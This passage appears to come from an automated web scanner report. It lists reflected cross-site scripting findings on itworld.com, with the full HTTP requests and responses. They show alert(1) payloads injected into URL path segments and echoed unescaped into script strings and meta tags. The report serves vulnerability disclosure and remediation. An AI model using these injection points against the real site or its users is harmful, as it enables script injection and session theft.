Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; mobify=0; __switchTo5x=56; __unam=dad84f1-13284325649-54133fa9-1; s_sess=%20s_cc%3Dtrue%3B%20s_ppv%3D14%3B%20SC_LINKS%3Dhomepage%255E%255ECyber%2520harassers%253A%2520You%2520can%2520hide%252C%2520but%2520you%2520can%25u2019t%2520run%255E%255Ehomepage%2520%257C%2520Cyber%2520harassers%253A%2520You%2520can%2520hide%252C%2520but%2520you%2520can%25u2019t%2520run%255E%255E%3B%20s_sq%3Didgitworldcomprod%253D%252526pid%25253Dhomepage%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.itworld.com/it-managementstrategy/204223/cyber-harassers-you-can-hide-you-can-t-run%252526ot%25253DA%3B; s_pers=%20s_pv%3Dhomepage%7C1316479993320%3B; __utma=222989251.1353402908.1316477884.1316477884.1316477884.1; __utmb=222989251; __utmc=222989251; __utmz=222989251.1316477884.1.1.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:30:22 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316460622"
Content-Type: text/html; charset=utf-8
Content-Length: 57976
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:30:24 GMT
X-Varnish: 1038169896
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...
<meta name="syndication-source" content="http://www.itworld.com/sites/all/modules/contrib/jquery_ui/jquery.ui/external/cookieab48a"><script>alert(1)</script>9e6ce0f041c/jquery.cookie.js?h"/>
...[SNIP]...

1.210. http://www.itworld.com/sites/all/modules/contrib/jquery_ui/jquery.ui/external/cookie/jquery.cookie.js [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /sites/all/modules/contrib/jquery_ui/jquery.ui/external/cookie/jquery.cookie.js

Issue detail

The value of REST URL parameter 9 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 62c75"-alert(1)-"40aa989ccee was submitted in the REST URL parameter 9. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all/modules/contrib/jquery_ui/jquery.ui/external/cookie/jquery.cookie.js62c75"-alert(1)-"40aa989ccee?h HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itworld.com/it-managementstrategy/204223/cyber-harassers-you-can-hide-you-can-t-run
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; mobify=0; __switchTo5x=56; __unam=dad84f1-13284325649-54133fa9-1; s_sess=%20s_cc%3Dtrue%3B%20s_ppv%3D14%3B%20SC_LINKS%3Dhomepage%255E%255ECyber%2520harassers%253A%2520You%2520can%2520hide%252C%2520but%2520you%2520can%25u2019t%2520run%255E%255Ehomepage%2520%257C%2520Cyber%2520harassers%253A%2520You%2520can%2520hide%252C%2520but%2520you%2520can%25u2019t%2520run%255E%255E%3B%20s_sq%3Didgitworldcomprod%253D%252526pid%25253Dhomepage%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.itworld.com/it-managementstrategy/204223/cyber-harassers-you-can-hide-you-can-t-run%252526ot%25253DA%3B; s_pers=%20s_pv%3Dhomepage%7C1316479993320%3B; __utma=222989251.1353402908.1316477884.1316477884.1316477884.1; __utmb=222989251; __utmc=222989251; __utmz=222989251.1316477884.1.1.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:30:48 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316460648"
Content-Type: text/html; charset=utf-8
Content-Length: 57757
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:30:52 GMT
X-Varnish: 1038171278
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...
.prop17="";
s.prop18="Anonymous";
s.prop19="";
s.prop20="";
s.prop29="";
s.prop30="";
s.prop34="";
s.prop35="";
s.prop45="/sites/all/modules/contrib/jquery_ui/jquery.ui/external/cookie/jquery.cookie.js62c75"-alert(1)-"40aa989ccee";
s.events="";
s.products="";
s.eVar1="";
s.eVar2="page";
s.eVar3="";
s.evar4="";
s.eVar9="";
s.eVar10="";
s.eVar11="53238";
s.eVar12="Oops! We couldn't find the page you requested.";
s.eVar13="CMS";

...[SNIP]...

1.211. http://www.itworld.com/sites/all/modules/contrib/jquery_ui/jquery.ui/external/cookie/jquery.cookie.js [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /sites/all/modules/contrib/jquery_ui/jquery.ui/external/cookie/jquery.cookie.js

Issue detail

The value of REST URL parameter 9 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c0ed"><script>alert(1)</script>d7577fef1e8 was submitted in the REST URL parameter 9. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/all/modules/contrib/jquery_ui/jquery.ui/external/cookie/jquery.cookie.js7c0ed"><script>alert(1)</script>d7577fef1e8?h HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itworld.com/it-managementstrategy/204223/cyber-harassers-you-can-hide-you-can-t-run
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; mobify=0; __switchTo5x=56; __unam=dad84f1-13284325649-54133fa9-1; s_sess=%20s_cc%3Dtrue%3B%20s_ppv%3D14%3B%20SC_LINKS%3Dhomepage%255E%255ECyber%2520harassers%253A%2520You%2520can%2520hide%252C%2520but%2520you%2520can%25u2019t%2520run%255E%255Ehomepage%2520%257C%2520Cyber%2520harassers%253A%2520You%2520can%2520hide%252C%2520but%2520you%2520can%25u2019t%2520run%255E%255E%3B%20s_sq%3Didgitworldcomprod%253D%252526pid%25253Dhomepage%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.itworld.com/it-managementstrategy/204223/cyber-harassers-you-can-hide-you-can-t-run%252526ot%25253DA%3B; s_pers=%20s_pv%3Dhomepage%7C1316479993320%3B; __utma=222989251.1353402908.1316477884.1316477884.1316477884.1; __utmb=222989251; __utmc=222989251; __utmz=222989251.1316477884.1.1.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:30:43 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316460643"
Content-Type: text/html; charset=utf-8
Content-Length: 57977
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:30:43 GMT
X-Varnish: 1038171166
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...
<meta name="syndication-source" content="http://www.itworld.com/sites/all/modules/contrib/jquery_ui/jquery.ui/external/cookie/jquery.cookie.js7c0ed"><script>alert(1)</script>d7577fef1e8?h"/>
...[SNIP]...

1.212. http://www.itworld.com/sites/all/modules/contrib/jquery_ui/jquery.ui/ui/ui.core.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /sites/all/modules/contrib/jquery_ui/jquery.ui/ui/ui.core.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f739e"-alert(1)-"1cd39c7ebd7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all/modulesf739e"-alert(1)-"1cd39c7ebd7/contrib/jquery_ui/jquery.ui/ui/ui.core.js?h HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itworld.com/
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:22:49 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316460169"
Content-Type: text/html; charset=utf-8
Content-Length: 57564
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:22:51 GMT
X-Varnish: 252446653
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...
S";
s.prop14="kgerich";
s.prop15="2008-06-20";
s.prop16="";
s.prop17="";
s.prop18="Anonymous";
s.prop19="";
s.prop20="";
s.prop29="";
s.prop30="";
s.prop34="";
s.prop35="";
s.prop45="/sites/all/modulesf739e"-alert(1)-"1cd39c7ebd7/contrib/jquery_ui/jquery.ui/ui/ui.core.js";
s.events="";
s.products="";
s.eVar1="";
s.eVar2="page";
s.eVar3="";
s.evar4="";
s.eVar9="";
s.eVar10="";
s.eVar11="53238";
s.eVar12="Oops! We couldn't find
...[SNIP]...

1.213. http://www.itworld.com/sites/all/modules/contrib/jquery_ui/jquery.ui/ui/ui.core.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /sites/all/modules/contrib/jquery_ui/jquery.ui/ui/ui.core.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 335e3"><script>alert(1)</script>fa509d83d2c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/all/modules335e3"><script>alert(1)</script>fa509d83d2c/contrib/jquery_ui/jquery.ui/ui/ui.core.js?h HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itworld.com/
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:22:39 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316460159"
Content-Type: text/html; charset=utf-8
Content-Length: 57784
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:22:42 GMT
X-Varnish: 252446477
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...
<meta name="syndication-source" content="http://www.itworld.com/sites/all/modules335e3"><script>alert(1)</script>fa509d83d2c/contrib/jquery_ui/jquery.ui/ui/ui.core.js?h"/>
...[SNIP]...

1.214. http://www.itworld.com/sites/all/modules/contrib/jquery_ui/jquery.ui/ui/ui.core.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /sites/all/modules/contrib/jquery_ui/jquery.ui/ui/ui.core.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 273ea"><script>alert(1)</script>3dab46c1e28 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/all/modules/contrib273ea"><script>alert(1)</script>3dab46c1e28/jquery_ui/jquery.ui/ui/ui.core.js?h HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itworld.com/
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:23:04 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316460184"
Content-Type: text/html; charset=utf-8
Content-Length: 57788
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:23:05 GMT
X-Varnish: 252446885
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...
<meta name="syndication-source" content="http://www.itworld.com/sites/all/modules/contrib273ea"><script>alert(1)</script>3dab46c1e28/jquery_ui/jquery.ui/ui/ui.core.js?h"/>
...[SNIP]...

1.215. http://www.itworld.com/sites/all/modules/contrib/jquery_ui/jquery.ui/ui/ui.core.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /sites/all/modules/contrib/jquery_ui/jquery.ui/ui/ui.core.js

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b9ac9"-alert(1)-"7b8840a7f1d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all/modules/contribb9ac9"-alert(1)-"7b8840a7f1d/jquery_ui/jquery.ui/ui/ui.core.js?h HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itworld.com/
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:23:28 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316460208"
Content-Type: text/html; charset=utf-8
Content-Length: 57570
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:23:35 GMT
X-Varnish: 252447393
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...
op14="kgerich";
s.prop15="2008-06-20";
s.prop16="";
s.prop17="";
s.prop18="Anonymous";
s.prop19="";
s.prop20="";
s.prop29="";
s.prop30="";
s.prop34="";
s.prop35="";
s.prop45="/sites/all/modules/contribb9ac9"-alert(1)-"7b8840a7f1d/jquery_ui/jquery.ui/ui/ui.core.js";
s.events="";
s.products="";
s.eVar1="";
s.eVar2="page";
s.eVar3="";
s.evar4